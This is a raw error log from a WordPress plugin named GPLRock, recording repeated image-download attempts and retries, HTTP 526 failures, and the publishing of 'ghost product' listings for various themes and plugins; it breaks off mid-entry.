GPLRock: Image downloaded successfully for product css-igniter-igloo-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fb7485df.jpg [02-Apr-2026 20:09:37 UTC] GPLRock: Using pre-downloaded image for product css-igniter-igloo-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fb7485df.jpg [02-Apr-2026 20:09:37 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-igloo-wordpress-theme [02-Apr-2026 20:09:39 UTC] GPLRock: Image downloaded successfully for product array-themes-editor-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-512cd5f3.jpg [02-Apr-2026 20:09:39 UTC] GPLRock: Using pre-downloaded image for product array-themes-editor-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-512cd5f3.jpg [02-Apr-2026 20:09:39 UTC] GPLRock: Ghost product published with image - Product ID: array-themes-editor-wordpress-theme [02-Apr-2026 20:09:40 UTC] GPLRock: Image downloaded successfully for product debutant-elementor-landing-page-wp-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f7cf1a16.jpg [02-Apr-2026 20:09:41 UTC] GPLRock: Using pre-downloaded image for product debutant-elementor-landing-page-wp-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f7cf1a16.jpg [02-Apr-2026 20:09:41 UTC] GPLRock: Ghost product published with image - Product ID: debutant-elementor-landing-page-wp-theme [02-Apr-2026 20:11:17 UTC] GPLRock: Image download failed for product aagan-agency-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:11:19 UTC] GPLRock: Image download failed for product aagan-agency-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:11:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aagan---agency-startup-wordpress-theme-11001.webp for product aagan-agency-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:11:21 UTC] GPLRock: Image download failed for product aagan-agency-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:11:23 UTC] GPLRock: Image download failed for product aagan-agency-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:11:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aagan---agency-startup-wordpress-theme-11001.webp for product aagan-agency-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:11:25 UTC] GPLRock WARNING: Image download failed for product aagan-agency-startup-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/aagan---agency-startup-wordpress-theme-11001.webp [02-Apr-2026 20:11:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aagan-agency-startup-wordpress-theme [02-Apr-2026 20:11:26 UTC] GPLRock: Image download failed for product oneclick-multi-purpose-woocommerce-responsive-digital-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:11:28 UTC] GPLRock: Image download failed for product oneclick-multi-purpose-woocommerce-responsive-digital-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:11:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oneclick---multi-purpose-woocommerce-responsive-digital-theme-26650.webp for product oneclick-multi-purpose-woocommerce-responsive-digital-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:11:30 UTC] GPLRock: Image download failed for product oneclick-multi-purpose-woocommerce-responsive-digital-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:11:32 UTC] GPLRock: Image download failed for product oneclick-multi-purpose-woocommerce-responsive-digital-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:11:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oneclick---multi-purpose-woocommerce-responsive-digital-theme-26650.webp for product oneclick-multi-purpose-woocommerce-responsive-digital-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:11:34 UTC] GPLRock WARNING: Image download failed for product oneclick-multi-purpose-woocommerce-responsive-digital-theme. URL: https://meldwp.com/wp-content/uploads/oneclick---multi-purpose-woocommerce-responsive-digital-theme-26650.webp [02-Apr-2026 20:11:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: oneclick-multi-purpose-woocommerce-responsive-digital-theme [02-Apr-2026 20:11:34 UTC] GPLRock: Image download failed for product duo-pwa-mobile-kit (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:11:36 UTC] GPLRock: Image download failed for product duo-pwa-mobile-kit (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:11:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/duo---pwa-mobile-kit-282.webp for product duo-pwa-mobile-kit after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:11:38 UTC] GPLRock: Image download failed for product duo-pwa-mobile-kit (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:11:41 UTC] GPLRock: Image download failed for product duo-pwa-mobile-kit (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:11:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/duo---pwa-mobile-kit-282.webp for product duo-pwa-mobile-kit after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:11:43 UTC] GPLRock WARNING: Image download failed for product duo-pwa-mobile-kit. URL: https://meldwp.com/wp-content/uploads/duo---pwa-mobile-kit-282.webp [02-Apr-2026 20:11:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: duo-pwa-mobile-kit [02-Apr-2026 20:11:43 UTC] GPLRock: Image download failed for product saasland-saas-startup-technology-it-solutions-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:11:45 UTC] GPLRock: Image download failed for product saasland-saas-startup-technology-it-solutions-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:11:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/saasland---saas-startup-technology--it-solutions-wordpress-theme-12147.webp for product saasland-saas-startup-technology-it-solutions-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:11:47 UTC] GPLRock: Image download failed for product saasland-saas-startup-technology-it-solutions-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:11:49 UTC] GPLRock: Image download failed for product saasland-saas-startup-technology-it-solutions-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:11:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/saasland---saas-startup-technology--it-solutions-wordpress-theme-12147.webp for product saasland-saas-startup-technology-it-solutions-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:11:51 UTC] GPLRock WARNING: Image download failed for product saasland-saas-startup-technology-it-solutions-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/saasland---saas-startup-technology--it-solutions-wordpress-theme-12147.webp [02-Apr-2026 20:11:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: saasland-saas-startup-technology-it-solutions-wordpress-theme [02-Apr-2026 20:11:51 UTC] GPLRock: Image download failed for product doom-massive-all-in-one-psd-xd-pack (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:11:54 UTC] GPLRock: Image download failed for product doom-massive-all-in-one-psd-xd-pack (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:11:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/doom---massive-all-in-one-psd--xd-pack-29074.webp for product doom-massive-all-in-one-psd-xd-pack after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:11:56 UTC] GPLRock: Image download failed for product doom-massive-all-in-one-psd-xd-pack (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:11:58 UTC] GPLRock: Image download failed for product doom-massive-all-in-one-psd-xd-pack (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:12:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/doom---massive-all-in-one-psd--xd-pack-29074.webp for product doom-massive-all-in-one-psd-xd-pack after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:12:00 UTC] GPLRock WARNING: Image download failed for product doom-massive-all-in-one-psd-xd-pack. URL: https://meldwp.com/wp-content/uploads/doom---massive-all-in-one-psd--xd-pack-29074.webp [02-Apr-2026 20:12:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: doom-massive-all-in-one-psd-xd-pack [02-Apr-2026 20:12:00 UTC] GPLRock: Image download failed for product motorx-car-dealer-listing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:12:02 UTC] GPLRock: Image download failed for product motorx-car-dealer-listing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:12:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/motorx---car-dealer--listing-wordpress-theme-27600.webp for product motorx-car-dealer-listing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:12:04 UTC] GPLRock: Image download failed for product motorx-car-dealer-listing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:12:06 UTC] GPLRock: Image download failed for product motorx-car-dealer-listing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:12:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/motorx---car-dealer--listing-wordpress-theme-27600.webp for product motorx-car-dealer-listing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:12:09 UTC] GPLRock WARNING: Image download failed for product motorx-car-dealer-listing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/motorx---car-dealer--listing-wordpress-theme-27600.webp [02-Apr-2026 20:12:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: motorx-car-dealer-listing-wordpress-theme [02-Apr-2026 20:12:09 UTC] GPLRock: Image download failed for product aravt-creative-multipurpose-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:12:11 UTC] GPLRock: Image download failed for product aravt-creative-multipurpose-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:12:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aravt---creative-multipurpose-theme-4820.webp for product aravt-creative-multipurpose-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:12:13 UTC] GPLRock: Image download failed for product aravt-creative-multipurpose-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:12:15 UTC] GPLRock: Image download failed for product aravt-creative-multipurpose-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:12:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aravt---creative-multipurpose-theme-4820.webp for product aravt-creative-multipurpose-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:12:17 UTC] GPLRock WARNING: Image download failed for product aravt-creative-multipurpose-theme. URL: https://meldwp.com/wp-content/uploads/aravt---creative-multipurpose-theme-4820.webp [02-Apr-2026 20:12:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aravt-creative-multipurpose-theme [02-Apr-2026 20:12:17 UTC] GPLRock: Image downloaded successfully for product yoga-shop-yoga-studio-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-908ee839.webp [02-Apr-2026 20:12:17 UTC] GPLRock: Using pre-downloaded image for product yoga-shop-yoga-studio-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-908ee839.webp [02-Apr-2026 20:12:17 UTC] GPLRock: Ghost product published with image - Product ID: yoga-shop-yoga-studio-wordpress-theme [02-Apr-2026 20:12:17 UTC] GPLRock: Image download failed for product kalliope-modern-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:12:20 UTC] GPLRock: Image download failed for product kalliope-modern-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:12:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kalliope---modern-blog-wordpress-theme-14658.webp for product kalliope-modern-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:12:22 UTC] GPLRock: Image download failed for product kalliope-modern-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:12:24 UTC] GPLRock: Image download failed for product kalliope-modern-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:12:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kalliope---modern-blog-wordpress-theme-14658.webp for product kalliope-modern-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:12:26 UTC] GPLRock WARNING: Image download failed for product kalliope-modern-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kalliope---modern-blog-wordpress-theme-14658.webp [02-Apr-2026 20:12:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kalliope-modern-blog-wordpress-theme [02-Apr-2026 20:12:26 UTC] GPLRock: Image downloaded successfully for product shadowcat-news-and-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6bf0b109.webp [02-Apr-2026 20:12:26 UTC] GPLRock: Using pre-downloaded image for product shadowcat-news-and-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6bf0b109.webp [02-Apr-2026 20:12:26 UTC] GPLRock: Ghost product published with image - Product ID: shadowcat-news-and-magazine-wordpress-theme [02-Apr-2026 20:12:39 UTC] GPLRock: Image downloaded successfully for product beautyspot-wordpress-theme-for-beauty-salons (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4cb04c95.jpg [02-Apr-2026 20:12:39 UTC] GPLRock: Using pre-downloaded image for product beautyspot-wordpress-theme-for-beauty-salons: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4cb04c95.jpg [02-Apr-2026 20:12:39 UTC] GPLRock: Ghost product published with image - Product ID: beautyspot-wordpress-theme-for-beauty-salons [02-Apr-2026 20:12:40 UTC] GPLRock: Image downloaded successfully for product woocommerce-category-accordion (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cc14f9c7.jpg [02-Apr-2026 20:12:40 UTC] GPLRock: Using pre-downloaded image for product woocommerce-category-accordion: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cc14f9c7.jpg [02-Apr-2026 20:12:40 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-category-accordion [02-Apr-2026 20:12:42 UTC] GPLRock: Image downloaded successfully for product composium-wp-bakery-page-builder-extensions-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-908f03ac.jpg [02-Apr-2026 20:12:42 UTC] GPLRock: Using pre-downloaded image for product composium-wp-bakery-page-builder-extensions-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-908f03ac.jpg [02-Apr-2026 20:12:42 UTC] GPLRock: Ghost product published with image - Product ID: composium-wp-bakery-page-builder-extensions-addon [02-Apr-2026 20:12:44 UTC] GPLRock: Image downloaded successfully for product ultimate-member-groups-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a59f3cfc.jpg [02-Apr-2026 20:12:44 UTC] GPLRock: Using pre-downloaded image for product ultimate-member-groups-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a59f3cfc.jpg [02-Apr-2026 20:12:44 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-member-groups-addon [02-Apr-2026 20:12:45 UTC] GPLRock: Image downloaded successfully for product elmastudio-kerikeri-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3d8ba971.jpg [02-Apr-2026 20:12:45 UTC] GPLRock: Using pre-downloaded image for product elmastudio-kerikeri-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3d8ba971.jpg [02-Apr-2026 20:12:45 UTC] GPLRock: Ghost product published with image - Product ID: elmastudio-kerikeri-wordpress-theme [02-Apr-2026 20:12:47 UTC] GPLRock: Image downloaded successfully for product woocommerce-product-size-guide (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-abb4707f.jpg [02-Apr-2026 20:12:47 UTC] GPLRock: Using pre-downloaded image for product woocommerce-product-size-guide: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-abb4707f.jpg [02-Apr-2026 20:12:47 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-product-size-guide [02-Apr-2026 20:12:49 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-questions-and-answers-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b79cac17.jpg [02-Apr-2026 20:12:49 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-questions-and-answers-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b79cac17.jpg [02-Apr-2026 20:12:49 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-questions-and-answers-premium [02-Apr-2026 20:12:50 UTC] GPLRock: Image downloaded successfully for product studiopress-daily-dish-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1e9a9b70.jpg [02-Apr-2026 20:12:50 UTC] GPLRock: Using pre-downloaded image for product studiopress-daily-dish-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1e9a9b70.jpg [02-Apr-2026 20:12:50 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-daily-dish-pro-genesis-wordpress-theme [02-Apr-2026 20:12:52 UTC] GPLRock: Image downloaded successfully for product homestore-storefront-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-54f4344b.jpg [02-Apr-2026 20:12:52 UTC] GPLRock: Using pre-downloaded image for product homestore-storefront-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-54f4344b.jpg [02-Apr-2026 20:12:52 UTC] GPLRock: Ghost product published with image - Product ID: homestore-storefront-woocommerce-theme [02-Apr-2026 20:12:53 UTC] GPLRock: Image downloaded successfully for product ninja-forms-recurly (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7d79e28c.jpg [02-Apr-2026 20:12:53 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-recurly: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7d79e28c.jpg [02-Apr-2026 20:12:53 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-recurly [02-Apr-2026 20:13:43 UTC] GPLRock: Image download failed for product easy-360-product-viewer-wordpress-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:13:45 UTC] GPLRock: Image download failed for product easy-360-product-viewer-wordpress-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:13:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/easy-360-product-viewer-wordpress--woocommerce-plugin-13379.webp for product easy-360-product-viewer-wordpress-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:13:47 UTC] GPLRock: Image download failed for product easy-360-product-viewer-wordpress-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:13:49 UTC] GPLRock: Image download failed for product easy-360-product-viewer-wordpress-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:13:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/easy-360-product-viewer-wordpress--woocommerce-plugin-13379.webp for product easy-360-product-viewer-wordpress-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:13:51 UTC] GPLRock WARNING: Image download failed for product easy-360-product-viewer-wordpress-woocommerce-plugin. URL: https://meldwp.com/wp-content/uploads/easy-360-product-viewer-wordpress--woocommerce-plugin-13379.webp [02-Apr-2026 20:13:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: easy-360-product-viewer-wordpress-woocommerce-plugin [02-Apr-2026 20:13:51 UTC] GPLRock: Image download failed for product pulse-animation-map-pulsating-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:13:53 UTC] GPLRock: Image download failed for product pulse-animation-map-pulsating-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:13:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pulse-animation---map-pulsating-for-wordpress-3630.webp for product pulse-animation-map-pulsating-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:13:56 UTC] GPLRock: Image download failed for product pulse-animation-map-pulsating-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:13:58 UTC] GPLRock: Image download failed for product pulse-animation-map-pulsating-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pulse-animation---map-pulsating-for-wordpress-3630.webp for product pulse-animation-map-pulsating-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:14:00 UTC] GPLRock WARNING: Image download failed for product pulse-animation-map-pulsating-for-wordpress. URL: https://meldwp.com/wp-content/uploads/pulse-animation---map-pulsating-for-wordpress-3630.webp [02-Apr-2026 20:14:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pulse-animation-map-pulsating-for-wordpress [02-Apr-2026 20:14:00 UTC] GPLRock: Image download failed for product bwd-social-icon-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:02 UTC] GPLRock: Image download failed for product bwd-social-icon-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bwd-social-icon-addon-for-elementor-15796.webp for product bwd-social-icon-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:14:04 UTC] GPLRock: Image download failed for product bwd-social-icon-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:06 UTC] GPLRock: Image download failed for product bwd-social-icon-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bwd-social-icon-addon-for-elementor-15796.webp for product bwd-social-icon-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:14:08 UTC] GPLRock WARNING: Image download failed for product bwd-social-icon-addon-for-elementor. URL: https://meldwp.com/wp-content/uploads/bwd-social-icon-addon-for-elementor-15796.webp [02-Apr-2026 20:14:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bwd-social-icon-addon-for-elementor [02-Apr-2026 20:14:09 UTC] GPLRock: Image download failed for product woocommerce-waitlist-pre-sale-list-back-in-stock-notifier (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:11 UTC] GPLRock: Image download failed for product woocommerce-waitlist-pre-sale-list-back-in-stock-notifier (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-waitlist--pre-sale-list--back-in-stock-notifier-22133.webp for product woocommerce-waitlist-pre-sale-list-back-in-stock-notifier after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:14:13 UTC] GPLRock: Image download failed for product woocommerce-waitlist-pre-sale-list-back-in-stock-notifier (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:15 UTC] GPLRock: Image download failed for product woocommerce-waitlist-pre-sale-list-back-in-stock-notifier (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-waitlist--pre-sale-list--back-in-stock-notifier-22133.webp for product woocommerce-waitlist-pre-sale-list-back-in-stock-notifier after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:14:17 UTC] GPLRock WARNING: Image download failed for product woocommerce-waitlist-pre-sale-list-back-in-stock-notifier. URL: https://meldwp.com/wp-content/uploads/woocommerce-waitlist--pre-sale-list--back-in-stock-notifier-22133.webp [02-Apr-2026 20:14:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-waitlist-pre-sale-list-back-in-stock-notifier [02-Apr-2026 20:14:17 UTC] GPLRock: Image download failed for product video-reel-live-streaming-addon-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:19 UTC] GPLRock: Image download failed for product video-reel-live-streaming-addon-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/video-reel-live-streaming-addon-for-wordpress-33787.webp for product video-reel-live-streaming-addon-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:14:22 UTC] GPLRock: Image download failed for product video-reel-live-streaming-addon-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:24 UTC] GPLRock: Image download failed for product video-reel-live-streaming-addon-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/video-reel-live-streaming-addon-for-wordpress-33787.webp for product video-reel-live-streaming-addon-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:14:26 UTC] GPLRock WARNING: Image download failed for product video-reel-live-streaming-addon-for-wordpress. URL: https://meldwp.com/wp-content/uploads/video-reel-live-streaming-addon-for-wordpress-33787.webp [02-Apr-2026 20:14:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: video-reel-live-streaming-addon-for-wordpress [02-Apr-2026 20:14:26 UTC] GPLRock: Image downloaded successfully for product helpdesk-3-the-professional-support-solution (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c37f262f.webp [02-Apr-2026 20:14:26 UTC] GPLRock: Using pre-downloaded image for product helpdesk-3-the-professional-support-solution: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c37f262f.webp [02-Apr-2026 20:14:26 UTC] GPLRock: Ghost product published with image - Product ID: helpdesk-3-the-professional-support-solution [02-Apr-2026 20:14:26 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-css3-accordion (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:28 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-css3-accordion (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---css3-accordion-13161.webp for product wpbakery-page-builder-add-on-css3-accordion after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:14:30 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-css3-accordion (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:33 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-css3-accordion (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---css3-accordion-13161.webp for product wpbakery-page-builder-add-on-css3-accordion after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:14:35 UTC] GPLRock WARNING: Image download failed for product wpbakery-page-builder-add-on-css3-accordion. URL: https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---css3-accordion-13161.webp [02-Apr-2026 20:14:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: 